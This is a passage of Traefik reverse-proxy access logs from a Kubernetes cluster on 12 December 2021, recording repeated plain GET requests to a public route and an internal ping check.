host="windell" container_name="traefik" docker_id="ee98498d62970b7ae9c8d91baca7bf5558922c5da490113b814883601a0306bd" container_hash="docker.io/library/traefik@sha256:ea0aa8832bfd08369166baecd40b35fc58979df8f5dc5182e4e63ee6adbe66db" container_image="docker.io/library/traefik:2.2.11"] ο»Ώ194.34.132.19 - - [12/Dec/2021:16:43:48 +0000] "GET / HTTP/1.1" 200 4646 "-" "-" 17626 "frigg-public-routes-22735e324d6d7eb80733@kubernetescrd" "http://10.42.1.239:80" 18ms<14>1 2021-12-12T16:43:48.796526Z windell traefik traefik-9f79b8c4c-mlvlm - [kubernetes pod_name="traefik-9f79b8c4c-mlvlm" namespace_name="kube-system" pod_id="7818a1e6-eacd-476e-b6e0-e39d82f0432b" host="windell" container_name="traefik" docker_id="ee98498d62970b7ae9c8d91baca7bf5558922c5da490113b814883601a0306bd" container_hash="docker.io/library/traefik@sha256:ea0aa8832bfd08369166baecd40b35fc58979df8f5dc5182e4e63ee6adbe66db" container_image="docker.io/library/traefik:2.2.11"] ο»Ώ194.34.132.19 - - [12/Dec/2021:16:43:48 +0000] "GET / HTTP/1.1" 200 4646 "-" "-" 17627 "frigg-public-routes-22735e324d6d7eb80733@kubernetescrd" "http://10.42.1.239:80" 18ms<14>1 2021-12-12T16:43:48.894455Z windell traefik traefik-9f79b8c4c-mlvlm - [kubernetes pod_name="traefik-9f79b8c4c-mlvlm" namespace_name="kube-system" pod_id="7818a1e6-eacd-476e-b6e0-e39d82f0432b" host="windell" container_name="traefik" docker_id="ee98498d62970b7ae9c8d91baca7bf5558922c5da490113b814883601a0306bd" container_hash="docker.io/library/traefik@sha256:ea0aa8832bfd08369166baecd40b35fc58979df8f5dc5182e4e63ee6adbe66db" container_image="docker.io/library/traefik:2.2.11"] ο»Ώ194.34.132.19 - - [12/Dec/2021:16:43:48 +0000] "GET / HTTP/1.1" 200 4646 "-" "-" 17628 "frigg-public-routes-22735e324d6d7eb80733@kubernetescrd" "http://10.42.1.239:80" 17ms<14>1 2021-12-12T16:43:48.959838Z windell traefik traefik-9f79b8c4c-mlvlm - [kubernetes pod_name="traefik-9f79b8c4c-mlvlm" namespace_name="kube-system" pod_id="7818a1e6-eacd-476e-b6e0-e39d82f0432b" host="windell" container_name="traefik" docker_id="ee98498d62970b7ae9c8d91baca7bf5558922c5da490113b814883601a0306bd" container_hash="docker.io/library/traefik@sha256:ea0aa8832bfd08369166baecd40b35fc58979df8f5dc5182e4e63ee6adbe66db" container_image="docker.io/library/traefik:2.2.11"] ο»Ώ10.42.1.1 - - [12/Dec/2021:16:43:48 +0000] "GET /ping HTTP/1.1" 200 2 "-" "-" 17629 "ping@internal" "-" 0ms